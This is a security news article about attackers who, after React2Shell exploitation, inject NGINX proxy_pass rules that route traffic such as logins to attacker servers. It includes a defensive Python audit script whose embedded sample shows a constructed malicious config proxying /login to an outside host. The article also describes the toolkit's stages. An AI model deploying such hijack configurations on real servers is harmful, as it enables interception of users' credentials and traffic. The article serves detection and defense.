

Ethical Hacking News

Malicious NGINX Configurations: A Lurking Threat to Web Traffic Security




Cybersecurity researchers have uncovered a web traffic hijacking campaign that uses malicious NGINX configurations to route user traffic through attacker-controlled backend servers. The campaign has been linked to exploitation of the React2Shell vulnerability (CVE-2025-55182); no flaw in NGINX itself is involved. Once the attackers have a foothold on a server, they write NGINX configuration that intercepts legitimate web traffic and proxies it through their own infrastructure. This article summarizes the attack and what it means for defenders.

  • Cybersecurity researchers have identified a web traffic hijacking campaign that uses malicious NGINX configurations.
  • The attackers, linked to React2Shell (CVE-2025-55182) exploitation, abuse NGINX's proxy_pass directive on servers they have already compromised to intercept and redirect legitimate user traffic; no vulnerability in NGINX itself is involved.
  • The threat actors target specific domains, including country-code TLDs mostly in Asia, Chinese hosting infrastructure (Baota Panel), and government and educational TLDs.
  • Persistent shell scripts inject the malicious configuration into NGINX.
  • The toolkit is multi-staged, with separate scripts for orchestration, Baota Panel hosts, configuration-path enumeration and reporting.
  • Regular audits of NGINX configurations, including every included file, are essential to detect such tampering.




    According to Datadog Security Labs, threat actors associated with the recent React2Shell exploitation have been deploying malicious NGINX configurations on compromised servers. These configurations capture incoming requests on certain predefined URL paths and forward them to domains under the attackers' control via the "proxy_pass" directive. Because proxy_pass is a reverse proxy rather than an HTTP redirect, the victim's browser keeps talking to the legitimate hostname while the request is actually served by the attackers' backend, so the hijack is invisible from the client side.
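    What such a configuration looks like, and the audit it calls for, as an added example that is not from the original article, from Datadog, or from the attackers' toolkit. The sample configuration embedded in the script is constructed; "example.edu", the hijacked paths, "cdn-assets.invalid" and 203.0.113.10 are placeholders, not indicators from the campaign. The script walks the configuration, collects every proxy_pass target and every member of an upstream block, and reports those that point outside loopback, RFC 1918 space, or an operator-supplied allowlist:

```python
"""Audit NGINX configuration for proxy targets outside the trusted set.
Added example for this article, not Datadog's tooling or the attackers' scripts.
The sample below is constructed: 'example.edu', the paths, 'cdn-assets.invalid'
and 203.0.113.10 are placeholders, not indicators from the campaign."""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample: a legitimate pool and root location, plus two injected
# pieces of the shape the article describes: a chosen path proxied straight to
# attacker infrastructure, and an outside host slipped into an existing pool.
SAMPLE_CONFIG = """
upstream app_pool {
    server 127.0.0.1:3000;
    server 203.0.113.10:8443 backup;           # injected pool member
}
server {
    server_name example.edu;

    location / {
        proxy_pass http://app_pool;
    }

    location /login {
        proxy_pass http://cdn-assets.invalid/;    # injected: logins served elsewhere
        proxy_set_header Host $host;
    }
}
"""

TRUSTED_NETS = [ipaddress.ip_network(n) for n in
                ("127.0.0.0/8", "::1/128", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
_COMMENT = re.compile(r"#[^\n]*")


def parse_targets(config_text):
    """Return (targets, upstream_names): targets is (block, target, line) for every
    proxy_pass and for every server directive inside an upstream{} block.
    Minimal brace walker, fine for normal files and `nginx -T` dumps; it does not
    handle quoted arguments holding ';' or '{', nor regex quantifiers like [0-9]{2}."""
    stack, buf, line, targets, upstreams = [], [], 1, [], set()
    for ch in _COMMENT.sub("", config_text):
        if ch == "\n":
            line += 1
        if ch == "{":
            header = " ".join("".join(buf).split())      # e.g. "location /login"
            stack.append(header)
            buf = []
            if header.startswith("upstream "):
                upstreams.add(header.split()[1])
        elif ch == "}":
            if stack:
                stack.pop()
            buf = []
        elif ch == ";":
            parts, buf = "".join(buf).split(), []
            inner = stack[-1] if stack else ""
            if len(parts) >= 2 and parts[0] == "proxy_pass":
                loc = next((h for h in reversed(stack) if h.startswith("location")), "(no location)")
                targets.append((loc, parts[1], line))
            elif len(parts) >= 2 and parts[0] == "server" and inner.startswith("upstream "):
                targets.append((inner, parts[1], line))
        else:
            buf.append(ch)
    return targets, upstreams


def target_host(target):
    """Host of a proxy_pass/upstream target; None for unix sockets and variables."""
    if "unix:" in target:
        return None
    host = urlsplit(target if "://" in target else "//" + target).hostname
    return None if not host or host.startswith("$") else host


def is_trusted(host, allowlist=()):
    """Allowlisted names and loopback/RFC 1918 addresses are expected upstreams."""
    if host in allowlist:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False                       # a hostname that is not allowlisted
    return any(ip in net for net in TRUSTED_NETS)


def audit(config_text, allowlist=()):
    """Findings for every target that is neither a local pool, trusted, nor allowlisted."""
    targets, upstreams = parse_targets(config_text)
    findings = []
    for block, target, line in targets:
        host = target_host(target)
        if host is None or host in upstreams:  # pool members are audited individually
            continue
        if not is_trusted(host, allowlist):
            findings.append({"line": line, "block": block, "target": target, "host": host})
    return findings
```

    On a live host, feed the script the output of `nginx -T`, which concatenates the main file with everything pulled in by include directives, so a configuration dropped into conf.d or a panel's vhost directory is covered rather than only nginx.conf. Seed the allowlist from known upstreams; anything proxied to a host outside it, particularly on login or API paths, deserves a look at the file's modification time and at whatever wrote it.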

    The attack is particularly targeted at country-code TLDs, mostly in Asia (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure (Baota Panel), and government and educational TLDs (.edu, .gov). The malicious configurations are also made persistent: shell scripts inject the configuration into NGINX.

    The attack is part of a larger toolkit with multiple stages. "zx.sh" acts as the orchestrator, executing subsequent stages through legitimate utilities such as curl or wget; if both are blocked, it opens a raw TCP connection and sends the HTTP request itself. "bt.sh" targets the Baota (BT) Management Panel environment and overwrites its NGINX configuration files. "4zdh.sh" enumerates common NGINX configuration locations and takes steps to minimize errors when creating new malicious configurations.

    The toolkit also includes "ok.sh," which generates a report of all active NGINX traffic hijacking rules. The threat actors' approach suggests an interest in interactive access rather than automated resource extraction.

    Defensively, this attack highlights the value of regular audits of NGINX configurations, covering every file pulled in by include directives and not just the main nginx.conf, together with monitoring for unexpected changes to those files.

    Separately, GreyNoise noted that two IP addresses, 193.142.147[.]209 and 87.121.84[.]24, account for 56% of all observed exploitation attempts two months after React2Shell was publicly disclosed. A total of 1,083 unique source IP addresses were involved in React2Shell exploitation between January 26 and February 2, 2026.

    The campaign also underscores the role of post-exploitation payloads in establishing persistence and creating malicious configuration files; the use of shell scripts to inject NGINX configuration shows the resourcefulness of the threat actors.

    In conclusion, the malicious NGINX configurations used in this campaign show deliberate planning and execution by the threat actors. Security teams should monitor for signs of this activity and audit their NGINX configurations regularly, treating any proxy_pass target outside their own infrastructure as suspect until explained.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Malicious-NGINX-Configurations-A-Lurking-Threat-to-Web-Traffic-Security-ehn.shtml

  • https://thehackernews.com/2026/02/hackers-exploit-react2shell-to-hijack.html

  • https://cybersixt.com/a/ff6tMrKmIRo_HPl7Q4rVZR


  • Published: Thu Feb 5 00:43:42 2026 by llama3.2 3B Q4_K_M
    © Ethical Hacking News . All rights reserved.